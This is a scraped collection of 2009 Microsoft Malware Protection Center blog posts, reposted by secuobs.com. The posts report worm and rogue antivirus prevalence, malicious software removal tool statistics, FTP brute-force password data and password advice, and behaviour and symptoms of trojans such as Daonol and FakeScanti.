malware is launched from a removable drive, it also opens Windows Explorer, so users may not be able to spot the difference between the two options IMAGE The worm connects to an IRC server this allows the backdoor's controllers to give the gift of more malware, as the server may order Hamweq to download and execute whatever files they see fit to install on the machine Some variants of Hamweq may also be ordered to participate in Distributed Denial of Service attacks Microsoft s latest Security Intelligence Report lists Hamweq as the second most prevalent distinct worm family reported by Forefront, our enterprise antivirus solution Worms that spread via network shares or via removable drives tend to have large numbers of reports in the corporate environments, as these environments are usually highly networked, and because removable drives such as USB memory sticks are used often Win32 Taterf, in spite of its payload being a password stealer for a number of different predominantly Chinese-language-based online role playing games, is another worm that is particularly prevalent in corporate environments worldwide third most reported worm family by Forefront , regardless of the region, and the fact that most corporations would not have these games installed on their systems Taterf, which is consistently one of the highest reported threats by MSRT, was found in high numbers in diverse regions such as Brazil, France, Russia, and South Africa You can reduce the effectiveness of these types of worms by ensuring that autorun content is not displayed in the autoplay dialog when removable or network drives are attached For Windows 7, this is the default behavior see http blogstechnetcom srd archive 2009 04 28 autorun-changes-in-windows-7aspx If you have an earlier version of Windows that is not already configured in this way, you can follow the instructions at http supportmicrosoftcom kb 971029 Alternatively, for Windows Vista or later, you can disable autoplay completely, or for particular types of media, via the Hardware and Sound section of the Control Panel David MMPC Melbourne IMAGE http://www.secuobs.com/revue/news/169832.shtmlhttp://www.secuobs.com/revue/news/169832.shtml Secuobs.com : 2009-12-01 04:22:27 - Microsoft Malware Protection Center - Today marks the beginning of National CyberSecurity Awareness Month here in the United States I would like to take this opportunity to acknowledge all the security professionals around the world who work tirelessly to make cyberspace a safer place for all our online pasttimes You know who you are It's nice to know we all work for the same team Jimmy Kuo PS I'm glad to see wwwstaysafeonlineinfo still going strong IMAGE http://www.secuobs.com/revue/news/167019.shtmlhttp://www.secuobs.com/revue/news/167019.shtml Secuobs.com : 2009-11-30 22:16:02 - Microsoft Malware Protection Center - In a recent blog posted on 18th November we talked about the significant threat that AV rogues had posed for our users this year Besides the prevalent rogues covered by the MSRT, the following is a longer list of AV rogues detected by Microsoft AV products such as Microsoft Security Essentials, Forefront Client Security, etc FakeXPA FakePowav MalwareBurn UnSpyPc DriveCleaner DocrorTrojan Winfixer FakeScanti Cleanator MalwareCrush PrivacyChampion SystemLiveProtect Yektel FakeSmoke Spyguarder AntivirusGold SystemGuard2009 WorldAntiSpy SpywareSecure IEDefender MalWarrior Malwareprotector SpywareSoftStop AntiSpyZone Antivirus2008 PrivacyCenter SpyLocked Trojanguarder MyBetterPC NeoSpace Winwebsec FakeRemoc SpywareStormer SecurityiGuard DoctorCleaner UniGray FakeSecSen VirusRemover Privacywarrior PrivacyProtector SpyBlast FakeFreeAV FakeRean Antivirus2009 AntiSpywareDeluxe Searchanddestroy AlfaCleaner WebSpyShield InternetAntivirus Antivirusxp ErrorGuard SpyCrush Fakeav Spyaway WinSpywareProtect Fakerednefed Antispyware2008 EZCatch EvidenceEraser Vaccine2008 FakeSpypro FakeCog AntiVirGear VaccineProgram TrustCleaner SearchSpy AntiSpywareExpert VirusRanger SpyDawn UltimateFixer WinHound Spyshield SpySheriff Antispycheck SpywareIsolator SpyFalcon PrivacyRedeemer VirusConst FakeVimes PCSave PSGuard SpywareStrike Nothingvirus AVClean FakeIA AntispyStorm Antivirustrojan XDef AntiSpywareSoldier AdvancedCleaner FakePccleaner SpywareQuake WareOut Kazaap FakeSpyguard SpyHeal VirusBurst VirusRescue TitanShield Fakeinit AntiVirusPro CodeClean Spybouncer MalwareWar SpyAxe Awola MyNetProtector FakeWSC DoctorAntivirus UltimateDefender VirusHeat Easyspywarecleaner SystemDefender AdsAlert You may recognize some of the relatively recent rogues from this list such as FakeXPA, FakeSecSen and FakeRean Some others, such as Winfixer and SpySheriff, have origins that actually go back to more than four years ago On page 100 of our Security Intelligence Report volume 7, we observed that rogues remained a significant threat even though they trended down to 134 million infected computers in 1H09 from 168 million in 2H08 Internet Explorer 8 SmartScreen Filter, a browser-based security feature, contributed to part of the decline As we have done in the past, we again encourage our readers to run a complete, up to date AV product such as Microsoft Security Essentials to protect their computers from these rogues, especially if located in English speaking countries - the regions where these rogues appear most active as highlighted in the SIR MSRT is a baseline tool we provide for the ecosystem to remove prevalent threats such as high profile rogues With Security Essentials, on the other hand, you get the benefit of the complete AV signature set from the MMPC and you get the essential protection features an AV solution needs real time, kernel mode detection, scheduled scan, complicated cleaning functionalities to address the emergent threats, etc Still, awareness of the threat event is also important Take a look at some of the write-ups of these threats, get familiar with some of the enticing rogue skins used like that displayed in the Win32 InternetAntivirus screenshot below and tell your friends and families to be alert to the tricks used to socially engineer victims into opening their wallets for these 'useless at best' rogue AVs IMAGE Scott Wu - MMPC IMAGE http://www.secuobs.com/revue/news/166925.shtmlhttp://www.secuobs.com/revue/news/166925.shtml Secuobs.com : 2009-11-27 15:05:07 - Microsoft Malware Protection Center - Almost a year ago, we started a project designed to monitor incoming attacks against a normal user on a day-to-day basis We presented you with details about the geographical area from where the attacks originated and what services were targeted, and we gave you just a hint about FTP dictionary-based attacks Now we re going into a bit more detail about the passwords, having so far gathered hundreds of user names and tens of thousands of passwords that have been used in automated attacks in the last couple of months Most of them were collected by our fake FTP server, which is designed to emulate a small part of the FTP protocol and log the information so that it s easy to process As you can see below in the statistics, the length of the passwords is quite interesting, mainly because the average length according to our data is 8 characters and that s quite close to the length of the passwords that many people use for their Internet accounts Statistics about user names and passwords Longest user name 15 chars Longest password 29 chars Average user name length 6 chars Average password length 8 chars Here is a top 10 list with the most common user names used in automated attacks User names Count Administrator 136971 Administrateur 107670 admin 8043 andrew 5570 dave 4569 steve 4569 tsinternetuser 4566 tsinternetusers 4566 paul 4276 adam 3287 And a similar list for passwords Passwords Count password 1188 123456 1137 comment 248 changeme 172 F kyou edited 170 abc123 155 peter 154 Michael 152 andrew 151 matthew 151 Trivia One attacker tried more than 400,000 user name and password combinations Most of the probing is done from compromised systems that are connected to a password-protected IRC channel and are waiting for commands As you can see in the image below, one such command is to scan and identify other vulnerable hosts Bot command We just want to make users aware of the fact that passwords of around 8-10 characters the average length of passwords that are normally used for Internet accounts are used in attacks Even a long password 10 to 15, or even 20 characters isn t good enough if it s dictionary-based As seen in the table above, there are passwords in dictionaries that are even using special characters for example comment , not only numbers and letters You should take good care of what user name and password you're choosing If your account has no limit on the number of login attempts, then knowing the user name is like having half of the job done Especially for the user names from the top 10 and mainly for the Administrator Administrateur accounts , the passwords shouldn t be picked lightly Usually we choose easy to type and or easy to remember passwords, but please don t forget that those passwords for the moment are the most commonly used or authentication on the Internet so they need to be strong The three basic things to remember when creating a strong password are the following 1 Use a combination of letters, numbers and special characters Also, remember that some dictionaries used in attacks have a l33t mode, which allows common letter number-to-special character substitutions like changing a- , i-1 ,o-0 and s , for example, password p w0rd Therefore, mix them in different ways so that they are not predictable 2 Use a combination of upper and lower case letters 3 Make it lengthy A longer password does not necessarily mean it is strong but it can help in some cases To check if you have a strong password, you can use Microsoft's password checker http wwwmicrosoftcom protect fraud passwords checkeraspx Password Checker Having a super strong password is not enough From time to time, you need to change it, especially when you feel that your account has been compromised We also advise you to have several sets of passwords that differ in every account so in case one has been compromised not all your accounts will be affected For additional information regarding passwords you can visit the following links Creating passwords - http wwwmicrosoftcom protect fraud passwords createaspx Maintaining passwords - http wwwmicrosoftcom protect fraud passwords secretaspx And by the way Don t forget your password Francis Allan Tan Seng Andrei Saygo IMAGE http://www.secuobs.com/revue/news/165761.shtmlhttp://www.secuobs.com/revue/news/165761.shtml Secuobs.com : 2009-11-19 01:07:20 - Microsoft Malware Protection Center - By continuing to include new variants of the existing threat families, the MSRT has removed malware from more than 15 million machines three days after its release on 10 November This month we ve also added Win32 FakeVimes and Win32 PrivacyCenter to the MSRT detection and have removed these new rogues from more than 110,000 machines A lot of the top threat families are no strangers if you refer to our previous blog posts, or our recent published Security Intelligence Report Out of these prevalent threat families worldwide, 8 are password stealers collecting online game credentials, online banking passwords or other user identities of users online accounts 8 of them are fake security products or trojan downloaders for rogues The MSRT now covers the following most high profile rogues Win32 FakeVimes Win32 PrivacyCenter Win32 FakeScanti Win32 FakeSecsen Win32 FakeXPA Win32 Yektel Win32 Winwebsec Win32 InternetAntivirus Win32 FakeSpypro Win32 FakeRean 5 are trojan downloaders or droppers, a threat category which is often an infection vector to deliver drive-by malware to the victims computers Win32 Koobface is still on top 25 though it has dropped out of top 10 Online Social Network sites such as Facebook continues to boost their security hardening to protect their customers and we welcome their actions Win32 Zlob had dropped out of the list in recent months after being extremely prevalent for almost three years We observed that the Zlob authors appeared to move to somewhere else in our Oct 2008 blog and Jan 2009 blog Family Computers Cleaned Most Significant Category Notes Taterf 239,870 Worms online game PWS Alureon 141,358 Miscellaneous Trojans data stealing trojans modifying DNS settings Bancos 138,803 Password Stealers Monitoring Tools Brazil online banking PWS Renos 115,970 Trojan Downloaders Droppers AV rogues downloaders FakeXPA 96,466 Miscellaneous Trojans AV rogues Yektel 90,982 Trojan Downloaders Droppers AV rogues FakeVimes 78,749 Miscellaneous Trojans AV rogues Cutwail 78,161 Trojan Downloaders Droppers Spambot FakeSpypro 57,534 Miscellaneous Trojans AV rogues Frethog 54,764 Password Stealers Monitoring Tools online game PWS Bredolab 48,323 Trojan Downloaders Droppers mass downloader IRCbot 40,259 Backdoors old spambot with traditional C C Vundo 38,481 Miscellaneous Trojans adware downloaders Koobface 36,300 Worms web20 worm targets social networking sites Brontok 35,531 Worms mass-mailing e-mail worms PrivacyCenter 34,726 Miscellaneous Trojans AV rogues Banker 28,293 Password Stealers Monitoring Tools Brazil online banking PWS Banload 25,166 Password Stealers Monitoring Tools Brazil online banking PWS Jeefo 23,887 Viruses parasitic file-infector virus Virut 22,549 Viruses viruses evolved with backdoor behaviors FakeRean 20,603 Miscellaneous Trojans AV rogues FakeScanti 20,222 Miscellaneous Trojans AV rogues Parite 20,076 Viruses Prevalent viruses in Asia Lolyda 19,210 Password Stealers Monitoring Tools online game PWS RJump 18,452 Worms Worm targeting removable devices As usual we encourage you to run Microsoft Security Essentials, which contains the full AV signature set from the MMPC, or another reputable AV product, to protect your internet activities Scott Wu -- MMPC IMAGE http://www.secuobs.com/revue/news/162763.shtmlhttp://www.secuobs.com/revue/news/162763.shtml Secuobs.com : 2009-11-16 23:03:30 - Microsoft Malware Protection Center - The migration of PC computing from 32-bit to 64-bit is in full swing at last, and if you ve been confused as to what it all means, you re not alone PCs built for years now have been capable of running both 32-bit and 64-bit operating systems, but for that you need 64-bit version of Windows and corresponding drivers for devices , and getting everything working on 64-bit used to be for brave and technical people only There are many advantages to using a 64-bit operating system using twice as many bits can make computers faster and the maximum amount of memory that can be used goes way above the 4 gigabyte limit that s 232 bytes And 64-bit Windows includes Patchguard, which makes tampering with the Windows kernel the part of the OS that makes the underlying hardware usable by software much, much more difficult Most PCs shipping with Windows 7 come with the 64-bit versions of Windows, and finally there s nothing to be confused about these PCs just work As reported in the Security Intelligence Report, 64-bit Windows has some of the lowest reported malware infection rates in the first half of 2009 IMAGE There are still many threats that can affect 64-bit Windows, unfortunately One other feature of 64-bit Windows is WOW64 which is an acronym for Windows On Windows 64 WOW64 emulates a 32-bit Windows environment to allow software to run on the 64-bit operating system, which is great for compatibility with applications that haven t ported to 64-bit yet, but also allows malicious code to grab a foothold Even though these threats may run, since they re running in the 32-bit emulated Windows environment they can do less to your computer, and don t see 64-bit processes at all For the same reason, 64-bit Windows needs 64-bit antimalware software like Microsoft Security Essentials to protect the whole computer Computer viruses are very confused by 64-bit Taking a look at 64-bit executable code detected by Microsoft antimalware technologies in the past month, the vast majority is innocent 64-bit files infected by 32-bit viruses While a 32-bit virus can only see other 32-bit processes, it unfortunately can see the file system, and can tamper with files it finds there The 32-bit code in a 64-bit binary will immediately crash when executed So even 64-bit Windows needs protection from malware There are also two remote control software packages that have been ported to 64-bit, which are potentially unwanted if you don t know they are on your computer, and a couple of hacking tools that have been written for 64-bit Threat Reports Distinct Files Virus Win32 Virut 193954 11307 RemoteAccess Win32 DameWareMiniRemoteControl 24672 16 Virus Win32 Slugin 12817 2474 HackTool Win32 Wpakill 9700 19 Virus Win32 Gael 5033 2206 RemoteAccess Win32 RemotelyAnywhere 388 111 Virus Win32 Bacalid 82 36 HackTool Win64 Welevate 25 3 Table 1 Detected 64-bit binaries Note that though the Microsoft Antimalware Engine may use the Win32 prefix for threat names, the technologies used can still locate malicious 64-bit code with signatures for 32-bit threats Overall, 64-bit malware is still exceedingly rare in the wild, and the additional protections built into 64-bit Windows will make it harder for malware to make the 64-bit jump that s easy for PC users with Windows 7 For a complete discussion of the PC threat landscape, see the Security Intelligence Report --Joe Faulhaber IMAGE http://www.secuobs.com/revue/news/161319.shtmlhttp://www.secuobs.com/revue/news/161319.shtml Secuobs.com : 2009-11-13 03:32:51 - Microsoft Malware Protection Center - Just over a week ago the Microsoft Malware Protection Center released the seventh edition of our Security Intelligence Report covering the first half of 2009 Like all of our previous reports we have distilled information and insight from the wide array of telemetry we have available to us New to this edition, however, is the inclusion of third party data and insight Specifically, we have worked with Shadowserver to include data collected for the Conficker Working Group CWG as well as insights from various Computer Emergency Response Teams CERTs worldwide Microsoft is thankful for the many strong partnerships we have around the world and is committed to the industry collaboration typified by CWG as well as the programs in the Microsoft Security Response Alliance MSRA MSRA is an umbrella program which is made up of similarly themed security programs for different constituencies Some MSRA programs include the Microsoft Virus Initiative MVI and the Virus Information Alliance which are in place to provide technical guidance, malware sample exchange and support to other Anti-virus ISVs as well as the Security Cooperation Program SCP and SCPcert which relate to information exchange and collaboration with governments and with CERT organizations governmental or non-governmental in regions across the globe We would specifically like to call your attention to content provided by several of our CERT partners As you have likely seen from either my previous blog entry on this Security Intelligence Report or from the report itself or even previous reports we have released we do a comparative analysis of infection rates between countries We ve asked several CERTs from some of the countries with the lowest rates of infection to discuss factors to which they attribute the lower rate and their thoughts on associated best practices Some very interesting things can be found in there starting on page 44 such as the correlation between higher broadband penetration and adoption of security updates, the correlation between prevalence of pirated software and infection rate and, most importantly, the importance of industry collaboration in reducing the impact of malware in a region Download the report here http wwwmicrosoftcom downloads detailsaspx FamilyID 037f3771-330e-4457-a52c-5b085dc0a4cd displaylang en Jeff Williams we want to hear from you SIRFB at microsoftcom IMAGE http://www.secuobs.com/revue/news/160352.shtmlhttp://www.secuobs.com/revue/news/160352.shtml Secuobs.com : 2009-11-10 23:58:17 - Microsoft Malware Protection Center - This month we ve added two more rogue families to the Malicious Software Removal Tool MSRT Win32 FakeVimes and Win32 PrivacyCenter Both have been around since early 2009, but have become more prevalent in the last few months Win32 FakeVimes has gone through a lot of different names, usually with two or three active at any given time Currently it s calling itself Windows System Defender and Windows Enterprise Suite Its interface may look familiar even if you ve never had the misfortune of being affected by the malware - it has copied elements of the Windows Defender and Windows Security Center UIs and its activate button includes an imitation of the Genuine Microsoft Software logo IMAGE In addition to the usual reports of non-existent malware, some variants of FakeVimes display imitation User Account Control UAC dialogs, with a recommended option of protect Clicking protect just leads to another dialog asking you to activate Sometimes FakeVimes also claims to detect spambot behaviour In this case, it uses the Microsoft Office logo in an attempt to make its warnings appear more credible IMAGE Win32 PrivacyCenter hasn t gone through anywhere near as names as FakeVimes It started off calling itself Privacy Center, changed to Privacy Components and now goes by Safety Center PrivacyCenter looks quite primitive compared to most modern rogues Sometimes it even reports its own files as malware IMAGE Some variants of PrivacyCenter make themselves the default shell application, so when you reboot you might find that the trojan runs instead of Explorer Both Win32 FakeVimes and Win32 PrivacyCenter are distributed through fake online scanners, similar to those used by most other rogues -- Hamish O'Dea As with most rogues, activate means pay IMAGE http://www.secuobs.com/revue/news/159560.shtmlhttp://www.secuobs.com/revue/news/159560.shtml Secuobs.com : 2009-11-06 05:24:44 - Microsoft Malware Protection Center - This year at the PacSec conference, I will present a Microsoft view of the threat landscape during the first six months in 2009 It will be based on telemetry data published in the latest Security Intelligence Report SIR published on Nov 2nd, 2009 You can find agenda of the conference at http pacsecjp agendahtml From data gathered by a number of Microsoft security products eg Forefront Client Security, Windows Defender, Microsoft Windows Malicious Software Removal Tool, etc , we see attacks by malware continuing to target specific regions or groups of users While Japan has a relatively lower infection rate than many countries, we notice that other Asian countries have a high relative infection rate which, in a number of cases, is due to high prevalence of Win32 Taterf a worm used to steal passwords As attackers continue to exploit the Internet infrastructure and application service environment in large scale, it is important to establish collaboration among ISPs, security solution providers, law enforcement and other service providers to combat malicious threats In Japan, participants in Japan s Cyber Clean Center eg ISPs, security ISVs including Microsoft, government have been working collaboratively against malicious and potentially unwanted malware We shall appreciate more in similar efforts and collaboration models, particularly in countries and regions where threats are most prevalent I hope to see people at the conference and invite them to learn more about the different threat mixes and trends in a number of countries, by downloading and reading the latest SIR Regards, Tony Lee Greetings from the old Capital, Kyoto ---------------------------------------- Hello from the historical imperial city of Kyoto Yesterday, or today depending on where you are, I had the honor of giving the opening presentation at the twelfth annual AVAR conference The AVAR conference has grown in significance over the past decade to become one of the top security conferences in the world The International AVAR conference concentrates on the computer security situation in the Asia Pacific region So I will be highlighting data from volume 7 of the Security Intelligence Report that has been gathered from the region All in all, most of the Asia and Pacific regions are significantly below worldwide average But, two of the most highly infected regions are among the largest and increasing This tells us we still have work ahead of us Community based defenses are what's needed in our next step in the war against malware And organizations like AVAR are necessary to bring the community together Jimmy Kuo IMAGE http://www.secuobs.com/revue/news/158096.shtmlhttp://www.secuobs.com/revue/news/158096.shtml Secuobs.com : 2009-11-04 04:20:44 - Microsoft Malware Protection Center - A relatively new trojan has been making the rounds and causing some problems, particularly on Windows XP systems Trojan Win32 Daonol is malware which hooks various system calls in order to steal credential information and redirect some web traffic It also protects itself by keeping some security-related software from running Several recent versions of this malware are buggy and prevent computers from successfully shutting down or more importantly starting up If you have or someone you know has a Windows XP system which won t boot completely ie, shows the Windows XP splash-screen with the progress bar, but then the screen turns black and the system never starts up completely , it s likely a Daonol infection Visit our write-up for Trojan Win32 Daonol to find instructions on cleaning Daonol off your system if you think you are infected Another obvious symptom of infection is that regeditexe and cmdexe will not launch properly To see if this is the case, navigate to Start-Run and enter regeditexe If nothing happens after a few seconds, most likely you are infected with Daonol If you launch cmdexe in the same way, you will see a command-prompt window but no text will appear in the window itself Daonol allows the regedit and cmd processes to launch, but it forces them into a suspended state and doesn t allow them to do anything Microsoft Security Essentials can detect and remove all known variants of Daonol, as well as keep you from being infected by it in the first place If you aren t using an anti-malware solution, do yourself a favor and head over there for a free copy of Microsoft Security Essentials Stay safe out there on the interwebs, Aaron Putnam IMAGE http://www.secuobs.com/revue/news/156963.shtmlhttp://www.secuobs.com/revue/news/156963.shtml Secuobs.com : 2009-11-03 01:07:16 - Microsoft Malware Protection Center - Twice a year we put together a report detailing trends that we see which are threat related in the computer security environment Today we have released our seventh report which you can find at wwwmicrosoftcom sir I m very excited about this report We, the MMPC, and our partners in the Microsoft Security Engineering Center, Bing, Windows Live and many others have collaborated to make this our most comprehensive report to date The report includes insights drawn from data collected consensually from the more than 450 million people running the Malicious Software Removal Tool each month, the hundreds of millions of mailboxes at Hotmail we protect, data gathered by Bing in scanning billions of web pages each year as well as the telemetry received from more than 100 million of our customers running Windows Live OneCare, Forefront Client Security, Windows Defender as well as spam, phishing and malware data relating to the billions of emails scanned by Forefront Online Protection for Exchange IMAGE The data we have available gives us an unparalleled view of threat activity on the internet both worldwide as well as regionally in more than 212 countries and regions across all seven continents In this edition we provide an in-depth review of malicious and potentially unwanted software, software exploits, security breaches, software vulnerabilities both Microsoft and third party around the world as well as providing detailed views of a number of countries We review malware distribution sites by country, discuss phishing and spam trends and geographic distribution, details on vulnerability disclosure practices, differences in threat distribution between consumers and enterprise and we also provide guidance for IT professionals and business decision makers based on this information For the first time ever, we include Best Practices contributed by representatives from four of the countries Austria, Finland, Germany, and Japan that have managed to maintain the lowest malware infection counts in their countries It is our hope that you find this information valuable and that it helps you to make shrewd risk-management decisions We also welcome your feedback for future editions Please email us at SIRFB at microsoftcom with your thoughts --Jeff Williams Principal Group Program Manager, MMPC IMAGE http://www.secuobs.com/revue/news/156349.shtmlhttp://www.secuobs.com/revue/news/156349.shtml Secuobs.com : 2009-10-27 22:28:19 - Microsoft Malware Protection Center - As of October 21st, the MSRT has removed the newly added threat, Win32 FakeScanti from 56,700 infected machines For this month, it was the 12th most prevalent threat family worldwide and 7th in the US Overall the MSRT has cleaned 2,516,235 machines this month from all kinds of malware infections We all know the threat landscape is not homogenous across geographic regions Let s take a look at US, China, and Brazil as a case study United States China Brazil Family Threats Machines Cleaned Family Threats Machines Cleaned Family Threats Machines Cleaned Alureon 147,387 117,351 Lolyda 77,781 72,863 Taterf 72,464 70,069 Taterf 121,988 116,217 Frethog 21,927 20,042 Bancos 67,577 59,414 FakeXPA 108,026 103,578 Ceekat 9,440 8,767 Frethog 33,455 32,009 Renos 69,147 55,461 Conficker 8,899 8,427 Banker 27,421 26,420 FakeRean 78,067 53,376 Hupigon 5,127 4,879 Conficker 19,664 18,398 Yektel 52,259 51,061 Parite 7,518 4,592 Banload 18,617 18,121 FakeScanti 70,120 50,260 RJump 3,875 2,552 Cutwail 8,452 5,269 Frethog 51,038 49,526 Brontok 980 969 Alureon 3,656 3,053 Daurso 32,205 32,150 Taterf 1,177 963 Renos 3,192 2,228 Koobface 43,640 27,793 Corripio 980 855 IRCbot 1,929 1,874 FakeSpypro 26,530 26,242 Sdbot 776 770 Brontok 1,768 1,739 Note Rogues in italics Password Stealer PWS bolded Some key takeaways In the US as well as other English speaking countries rogues are predominant Six of the top ten threat families in the US are rogues or rogue-related trojan downloaders This poses a challenge for the end users to identify the legit AV products when there are so many rogue products popping up on the users machines Six of the top ten threat families in China are password stealers, most of which are hunting for online gamers credentials Six of the top ten threat families in Brazil are also password stealers, though a lot of them Bancos, Banker and Banload tend to target online banking credentials in Brazil We close, as we always do, by urging you to take action and protect yourself Scott Wu IMAGE http://www.secuobs.com/revue/news/154565.shtmlhttp://www.secuobs.com/revue/news/154565.shtml Secuobs.com : 2009-10-21 03:54:56 - Microsoft Malware Protection Center - As we ve mentioned before, your average user is the most at risk of getting infected these days So, with the release of Microsoft Security Essentials recently en masse, we re really able to see some of the fruits of our labour over the last few years We re very pleased to see such a positive response to MSE, with many new home users giving it a try, which as you can imagine, makes us all happy little Vegemites As you might expect, we see pretty different infection types from home-users versus the enterprise Generally, infection vectors for the home user are web-based either via malicious websites or by being enticed to download something that is, how you say not so much with the good The term home user generalises computer-based experience of these users covers a broad spectrum The savvier of these computer users, one would expect, would have a better chance of avoiding infection However this is not entirely true as we ve mentioned in previous posts, savvy computer users actually open themselves up to more risks while they re exploring the deeper darker depths of what the Internet has to offer To wit, after MSE s release, we ve seen a spike in a particular variant of Win32 Bifrose Backdoor Win32 BifroseEO Why, you ask Well, it seems that the malware authors or perhaps an unsuspecting pirate are distributing a cracked version of Windows that comes pre-infected for your convenience labelled, fittingly, Vista Black Edition Just to clarify, this means computer users are downloading an ISO of pirated Microsoft software and saving to disk on a Genuine Windows system and a free Microsoft anti-virus product is alerting them to a potential infection in their freshly stolen software I m not really sure if irony really emphasises the situation enough But hey, at least the Windows is free , right What s even more interesting read funny is that despite this, it seems this isn t enough to stop people from trying to utilize their ill-gotten gains Underground forums are teeming with helpful hints on how to disinfect your newly acquired though somewhat not as advertised software No doubt some of the instructions include using other pirated software products So you see kids, illegal software is seldom free of all cost Chances are you re paying for it in ways you didn t consider Matt McCormack MMPC Melbourne The team down in Australia at least Disclaimer Free may be changed at any time to actually mean cost you , with one or more of the following words appended to the end passwords, bandwidth, login information, bank account details, email accounts, credit rating, dignity, IMAGE http://www.secuobs.com/revue/news/152359.shtmlhttp://www.secuobs.com/revue/news/152359.shtml Secuobs.com : 2009-10-16 08:34:51 - Microsoft Malware Protection Center - Now that Microsoft Security Essentials is generally available to consumers in 19 countries, we've had a chance to go over the data, and there are some very interesting results Just in the first week we saw well over 15 million downloads of Microsoft Security Essentials, but the price free to Windows users is hard to beat Computers reporting detections up to October 6 almost four million detections on 535,752 distinct machines The detections are eight times the machine count because many computers are infected with multiple threats Microsoft Security Essentials is available in 8 languages and 19 markets at RTM, which covers a lot of the PC using world The geographic distribution of detections so far still closely follows the Microsoft Security Essentials Beta countries, and is ramping up in other countries that use the 8 languages IMAGE Looking at counts of computers reporting detections by threat categories, we see that the order is different in each of the top three countries Trojans are the top detected category in the US, China has lots of potentially unwanted software threats, and worms particularly Conficker are very active in Brazil There are also many exploits being encountered in China, which may mean these PCs do not have the latest security updates IMAGE The top threat families for these countries have remarkably similar curves, but very different family mixes China top families include several exploits ShellCode, IFrameRef , the US has the trojans Wimad and rogue trojan FakeXPA at the top, while Brazil has worms Conficker and Taterf For family details, see the MMPC threat encyclopedia at http microsoftcom security portal IMAGE Looking at the operating systems breakdown, we're seeing lots of Windows 7 using Microsoft Security Essentials, but a pretty even balance between OS'es IMAGE The Windows 7 numbers are spectacular for an operating system that hasn't yet released for global availability Even better, about 1 3rd of Windows 7 Microsoft Security Essentials machines are 64-bit, which is even more resistant to malware than 32-bit due to PatchGuard By looking at detections divided by active Microsoft Security Essentials machines over the whole population, we see far more detections per XP machine, with the fewest from Win7 This follows our usual observed trend of seeing less malware on newer OSes and service packs IMAGE In one short week, Microsoft Security Essentials's making a big difference to those people using it on their computers If you don't have updated antimalware on your computer we strongly recommend giving Microsoft Security Essentials a try --Joe Faulhaber IMAGE http://www.secuobs.com/revue/news/151101.shtmlhttp://www.secuobs.com/revue/news/151101.shtml Secuobs.com : 2009-10-14 01:56:22 - Microsoft Malware Protection Center - Anyone who s seen a system infected by a rogue security program doesn t need to be told how annoying they can be, as they attempt to scare, threaten, cajole, hector, harangue, pester, aggravate, intimidate, badger, harass and generally nag the user into paying to register the fake software And even among rogues, there are few that are quite as annoying as Win32 FakeScanti, which is this month s addition to the Malicious Software Removal Tool MSRT I realize I m being more than a little repetitive here But this still pales in comparison to how repetitive your average rogue can get We first saw a variant of Win32 FakeScanti back in early March of this year, when it went by the name of ASC Antivirus There was then very little activity on the FakeScanti front until late July, when we noticed a file, which we detect as TrojanDownloader Win32 FakeScanti, downloading a new version of the scanner going by the name of Windows Antivirus Pro This version was proactively detected by the signatures added in March Since then there has been a steady stream of new files, but only one name change, to Windows Police Pro Apart from the name change, the user interface, and even the list of alleged malware detected by this rogue, has remained identical IMAGE IMAGE FakeScanti has your usual grab bag of popups, system tray balloons, and dialog boxes and there are many examples of these in our Win32 FakeScanti description all reporting malicious activity, and recommending that the reported threats be removed Of course, if you want this to happen, then naturally you have to pay IMAGE These popups tend to pile up on the screen at a rapid rate, and dismissing any one of these results in the confirmation dialog below, which also needs to be closed Notice how the placement of the Purchase and Continue buttons is swapped compared to the dialog above IMAGE Win32 FakeScanti also uses a number of other tricks common to many other rogues, such as the display of a fake version of the Windows Security Center, or blocking access to certain web sites IMAGE It uses a number of other methods in an attempt to convince users that the system is infected These include Periodically rebooting the system Preventing other executables from running IMAGE It does this by associating the exe extension with desotexe, one of the files installed by Win32 FakeScanti As a result, when an attempt is made to run one of these files, the filename is passed to desotexe, which will decide whether it is allowed to run, and display a message box such as the one above if not Using Active Desktop to place text on the desktop background IMAGE Displaying error messages which resemble the Dr Watson Windows system error dialog IMAGE The Fix it button launches the fake scanner The other buttons do not do anything As we've mentioned before, if you're concerned about the veracity or legitimacy of a particular antivirus scanner, it's a good idea to check if the product in question has received any industry-recognized certification Virus Bulletin VB100 is a good place to start, but there are other industry-recognized testing and certification bodies that are good for this kind of verification If you're looking for security software for your computer, you could also visit http wwwmicrosoftcom windows antivirus-partners for a list of security software providers If you believe you are infected, we encourage you to use the Windows Live OneCare safety scanner to check your PC for malware and to help remove them from your system In addition we encourage you to submit any suspicious files to the MMPC team for analysis If you don t already have active, up-to-date Anti-malware protection remember that our new security product - Microsoft Security Essentials runs quietly in the background and never asks you for payment --David Wood IMAGE http://www.secuobs.com/revue/news/150130.shtmlhttp://www.secuobs.com/revue/news/150130.shtml Secuobs.com : 2009-10-12 21:54:13 - Microsoft Malware Protection Center - Based on the interest we saw in the various presentations our team did at Virus Bulletin in Geneva a couple of weeks back we thought you might be interested in where else we will be presenting in the coming weeks October 13 Vinny Gullotto will be in a panel discussion in Washington DC at the Emerging Threats, Vulnerabilities, Challenges in the Cybersecurity Ecosystem event put on by TechAmerica You can find information on how to register for this event at http wwwtechamericaorg cybersecurity-ecosystem Also on October 13, Jeff Williams will present the keynote for Malware 2009 in Montreal, Canada Information on Malware 2009 is available at http wwwmalware2009org On November 4, Jimmy Kuo will present the keynote for the Association of anti-Virus Asia Researchers International Conference AVAR in Kyoto, Japan Information on AVAR 2009 can be found here http wwwaavarorg avar2009 November 4-5 also is when you will find us at the PacSec conference in Tokyo, Japan where Tony Lee will be presenting on the threat landscape and where Jeff Williams may deliver a lightning talk if he has the chance You can find information about PacSec at http pacsecjp That s all for now since we need time to pack We hope to see many of you at one or more of these events --Microsoft Malware Protection Center IMAGE http://www.secuobs.com/revue/news/149699.shtmlhttp://www.secuobs.com/revue/news/149699.shtml Secuobs.com : 2009-10-01 21:00:10 - Microsoft Malware Protection Center - Back in our labs in Dublin, Melbourne, and Redmond from the 2009 Virus Bulletin conference This year there were almost 400 attendees and 49 presentations covered by 60 speakers 7 of them from Microsoft The MMPC had presenters from all three labs at the conference and we started and ended the technical stream The topics this year included malware, spam, and this year's hot topic, cloud technology There were also interesting talks on social networks, URL shortening, browser plug-ins, Banker trojans, and testing the performance of in-the-cloud antivirus scanners It was exciting for our first-time speakers to meet others from the industry It was also an opportunity to catch up with old friends and colleagues The welcome drinks and gala dinner allowed us to mingle with them in a relaxed atmosphere Microsoft also won second place in the IT Security Table Foosball Championship Francis from the Dublin MMPC lab and Terry from the Antispam team played against foosball teams from other companies We had also the chance to see some sights in Geneva and the surrounding countryside and vineyards which are directly adjacent to France 